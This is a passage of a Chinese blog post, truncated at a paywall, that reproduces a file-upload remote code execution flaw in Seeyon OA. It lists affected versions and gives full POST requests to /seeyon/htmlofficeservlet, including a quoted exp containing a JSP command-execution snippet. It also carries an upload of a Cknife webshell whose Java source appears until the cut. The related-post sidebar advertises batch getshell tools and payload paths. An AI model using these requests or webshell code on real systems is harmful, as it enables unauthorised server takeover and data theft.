linux卸载致远oa,致远oa(seeyon)文件上传漏洞重现及分析

最新推荐文章于 2024-03-20 21:00:00 发布
VIP文章 最新推荐文章于 2024-03-20 21:00:00 发布
阅读量2.2k 收藏
点赞数
文章标签: linux卸载致远oa

0x00 影响范围

经本人测试,如下

v6.1sp2

a6+v7sp3

A8-v5 v6.1sp1

实际范围不止以上版本。

0x01 漏洞重现

验证:

617512626a52b09b8e2feb61ac617253.png

网上流传的exp:

DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV

OPTION=S3WYOSWLBSGr

currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66

CREATEDATE=wUghPB3szB3Xwg66

RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6

originalFileId=wV66

originalCreateDate=wUghPB3szB3Xwg66

FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6

needReadFile=yRWZdAS6

originalCreateDate=wLSGP4oEzLKAz4=iz=66

"+excuteCmd(request.getParameter("cmd")) + "");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

POC:

//根据exp1修改

a6+v7sp3

发送数据包:

POST /seeyon/htmlofficeservlet HTTP/1.1

Host: xxx.com.cn

Pragma: no-cache

Cache-Control: no-cache

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: JSESSIONID=AD5D04D5A82032FCB3C91028ADF9F839; loginPageURL=

Connection: close

Content-Length: 462

DBSTEP V3.0 345 0 21 DBSTEP=OKMLlKlV

OPTION=S3WYOSWLBSGr

currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66

CREATEDATE=wUghPB3szB3Xwg66

RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6

originalFileId=wV66

originalCreateDate=wUghPB3szB3Xwg66

FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdbrJuz7T2dEg6

needReadFile=yRWZdAS6

originalCreateDate=wLSGP4oEzLKAz4=iz=66

only-test-seeyon-rcexxxxxx

d45d4131e3cef20aa2a61751f381ac0b.png

EXP0:传Cknife马

v6.1sp2

POST /seeyon/htmlofficeservlet HTTP/1.1

Host: 58.1.1.2:81

Pragma: no-cache

Cache-Control: no-cache

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: JSESSIONID=0d218993-e7c3-4caa-8281-42c886e5f42c; loginPageURL=""

Connection: close

Content-Length: 9540

DBSTEP V3.0 348 0 9122 DBSTEP=OKMLlKlV

OPTION=S3WYOSWLBSGr

currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66

CREATEDATE=wUghPB3szB3Xwg66

RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6

originalFileId=wV66

originalCreateDate=wUghPB3szB3Xwg66

FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5cfT2dEg6

needReadFile=yRWZdAS6

originalCreateDate=wLSGP4oEzLKAz4=iz=66

String Pwd = "x";

String cs = "UTF-8";

String EC(String s) throws Exception {

return new String(s.getBytes("ISO-8859-1"),cs);

}

Connection GC(String s) throws Exception {

String[] x = s.trim().split("choraheiheihei");

Class.forName(x[0].trim());

if(x[1].indexOf("jdbc:oracle")!=-1){

return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);

}else{

Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);

if (x.length > 4) {

c.setCatalog(x[4]);

}

return c;

}

}

void AA(StringBuffer sb) throws Exception {

File k = new File("");

File r[] = k.listRoots();

for (int i = 0; i < r.length; i++) {

sb.append(r[i].toString().substring(0, 2));

}

}

void BB(String s, StringBuffer sb) throws Exception {

File oF = new File(s), l[] = oF.listFiles();

String sT, sQ, sF = "";

java.util.Date dt;

SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");

for (int i = 0; i < l.length; i++) {

dt = new java.util.Date(l[i].lastModified());

sT = fm.format(dt);

sQ = l[i].canRead() ? "R" : "";

sQ += l[i].canWrite() ? " W" : "";

if (l[i].isDirectory()) {

s

最低0.47元/天 解锁文章
weixin_39937312
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
seeyonAjaxGetshell:致远OA seeyon未授权漏洞批量getshell
05-28
seeyonAjaxGetshell 致远OAseeyon未授权漏洞+文件上传批量getshell 抄借鉴tools论坛大佬的payload写了个批量拿shell的脚本。 Note: 为了方便(懒比)直接调用curl,因此请在Linux下运行。 ip.txt --> 待检测IP shell.txt --> shell shell: 密码:rebeyond 冰蝎3连接 2020年1月9日,阿里云应急响应中心监控到致远OA ajaxAction 文件上传漏洞利用代码披露。 漏洞描述 致远OA是一套办公协同软件。近日,阿里云应急响应中心监控到致远OA ajaxAction 文件上传漏洞利用代码披露。由于致远OA旧版本某些ajax接口存在未授权访问,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。致远OA官方已针对该漏洞提供补丁,该漏洞利用代码已在互联网上公开流传。阿
ajax的auto是true,致远OA ajax.do未授权上传/seeyon/autoinstall.do.css(莫名其妙的坑记录一下) CNVD-2021-01627...
weixin_39683176的博客
08-05 2166
0x01打seeyon的站用ajax.do未授权上传的时候遇见了神奇的事情,先上payload吧,下面shell的路径为/seeyon/bak0.jspx,哥斯拉默认密码和密钥。POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompres...
致远OA文件上传漏洞(含批量检测POC)
最新发布
Karka_的博客
03-20 1713
漏洞描述* 漏洞描述文章内容仅供学习参考请勿用于非法用途。
jsp详情
拳打坏儿童的博客
07-06 648
SP页面本质上是一个[Servlet](https://so.csdn.net/so/search?q=Servlet&spm=1001.2101.3001.7020)程序,第一次访问JSP页面时(运行Tomcat服务器后在浏览器地址栏输入路径),Tomcat服务器会将此JSP页面翻译成为一个Java源文件,并对其进行编译成为.class字节码文件。而HttpJspBase类直接继承于HttpServlet类,即JSP翻译出来的Java类间接继承于HttpServlet类,证明JSP页面是一个Servlet
致远OA检测工具-seeyon_exp
siu~
09-21 723
致远OA综合利用工具
Regsvr32命令修复系统故障实例
01-22 1561
首先需要公布的是上次我的显示桌面图标没有,解决方法:regsvr32 /n /i:u shell32 使用过activex的人都知道,activex不注册是不能够被系统识别和使用的,一般安装程序都会自动地把它所使用的activex控件注册,但如果你拿到的一个控件需要手动注册怎么办呢?如果修改注册表那就太麻烦了,在windows的system文件夹下有一个regsvr32.exe的程序,它就是w
致远(用友)OA或M1 漏洞复现
ccz4854的博客
08-09 4679
致远OA通过发送特殊请求获取session,在通过文件上传接口上传特殊构造的恶意压缩包,并通过解压为webshell控制服务器。
致远OA漏洞复现
热门推荐
混子
12-31 4万+
近段时间,Log4j2比较热,像极了XSS到处插,插完,dnslog就可能会给你满意的答案,有的安全人员已经整出了burp Log4j2的插件,想必小伙伴们都用过了,也是相当巴适。在这个热度居高不下的情况下,有人发现了致远OA也存在该漏洞,抱着试试的想法,尝试了下,真香。趁着Log4j2的机会,就把致远OA的历史漏洞复现一下,并写了批量url检测是否存在以下漏洞(https://github.com/Xd-tl/Seeyon_POC)
【渗透测试】一次从黑盒转向白盒
HBohan的博客
11-05 687
前言 本次是针对学校某系统的渗透记录,已获得相应授权。通用漏洞涉及影响单位早前已提交至SRC平台,厂商已发布对应补丁。 【查看资料】 信息收集 目标系统主要是一个支付平台,是近期刚上线的系统,向学校老师取得相应授权后开始测试。 软件开发商:`xx软件开发有限公司/xxsoft/xxxx.com.cn` 开发语言: `Java` 框架: `St2` 因为是近期刚上线的系统,单点认证还没有接入。无法通过单点认证登录此系统,在尝试爆破admin密码后无果. 开始转向源码的收集。毕竟白盒才是最直接的手段。源码的收
1.致远OA二次开发G6 A6 A8 本机软件安装
qq_41007688的博客
05-07 4603
开发环境经常需要调试,所以自身电脑必须要安装致远协同OA软件,对应授权申请即可。 如果本机不安装,开发调试起来非常困难的。 一次启动可能十分钟。 本机的环境其实是可以安装多份的 1.先讲解下卸载 (如果想共存多个版本,老的版本文件夹先复制一份) 2.安装,先从供应商那边获取安装包 A8版本的安装包(我们就使用A88.0进行讲解) Mysql SqlServer安装 OA A88.0 1.进入sqlserver数据库 sa sql@123 2.新建数据库 选项----新建数据库时排序规则选择:Chine
linux卸载致远oa,致远OA ajaxAction formulaManager 未授权文件上传漏洞复现
weixin_34603379的博客
05-06 1423
POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1Host: x.x.x.xContent-Length: 3519Cache-Control: max-age=0Upgrade-Insecure-...
致远OA远程命令POC.txt
07-03
致远A8-OA 0day POC 漏洞情况: 访问 /seeyon/htmlofficeservlet 出现 DBSTEP V3.0 0 21 0 htmoffice operate err '''
致远OA7.0sp3安装教程
03-25
致远OA7.0sp3安装教程
致远OA3.0发布文档
01-13
致远OA3.0发布文档
致远OA-ajax.do未授权文件上传漏洞1
08-08
近日,致远OA ajaxAction 文件上传漏洞利用代码披露,由于致远OA旧版本中某些接口存在未授权访问,以及部分函数过滤不足,攻击者通过构造恶意请求,可在无
致远OA开发REST远程接口实现发送表单
08-02
致远OA开发,调用REST接口,实现远程发起OA表单。附上实现代码、相关jar包、以及致远API地址
致远A8-M平台API参考手册
08-22
2、 可以略过下面几节,直接从服务列表开始阅读,在 Java 项目中包含 seeyon-api.jar 和 v3x-services.jar 即可。 3、 编写的代码必须与 A8 部署在一起(同一虚拟机,同一上下文)。 4、 示例代码参考每一接口的...
HW漏洞集合(三)-seeyon&yonyou-yaml版
HWHXY的博客
03-31 1990
HW漏洞集合(三)-yaml版 link:应用安全 - 工具 | 框架 - 致远OA - 漏洞汇总 21. seeyon A6 sqli注入 补充说明:A6的注入点有很多,还是汇总到一个poc里面吧,感觉都是比较老的注入点了 name: poc-yaml-seeyon-A6-sqli set: rand: randomInt(200000000, 210000000) groups: poc1: - method: GET path: /HJ/iSignatureHtmlServ
致远FAQ】致远OA启动不起来了(下集)
致远OA的博客
09-17 1840
恢复了更新补丁包备份seeyon,仍无法启动协同服务 问题现象: 恢复了更新补丁包备份seeyon,仍无法启动协同服务 处理方法: 检查webapps目录下是否存在备份seeyon文件夹 移除webapps目录下备份的seeyon文件夹。 初始化Spring失败 问题现象: 启动协同服务,控制台输出【初始化Spring失败】【could not execute update query】 解决方法: 检查关键日志ApacheJetspeed/logs_sy/spring.log,本例
致远oa a8漏洞复现
08-01
致远OA A8存在远程任意文件上传漏洞,攻击者可以利用该漏洞在未授权的情况下上传恶意文件并执行任意代码。漏洞点在于致远OA-A8系统的Servlet接口暴露,安全过滤处理措施不足,使得用户在无需认证的情况下实现任意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值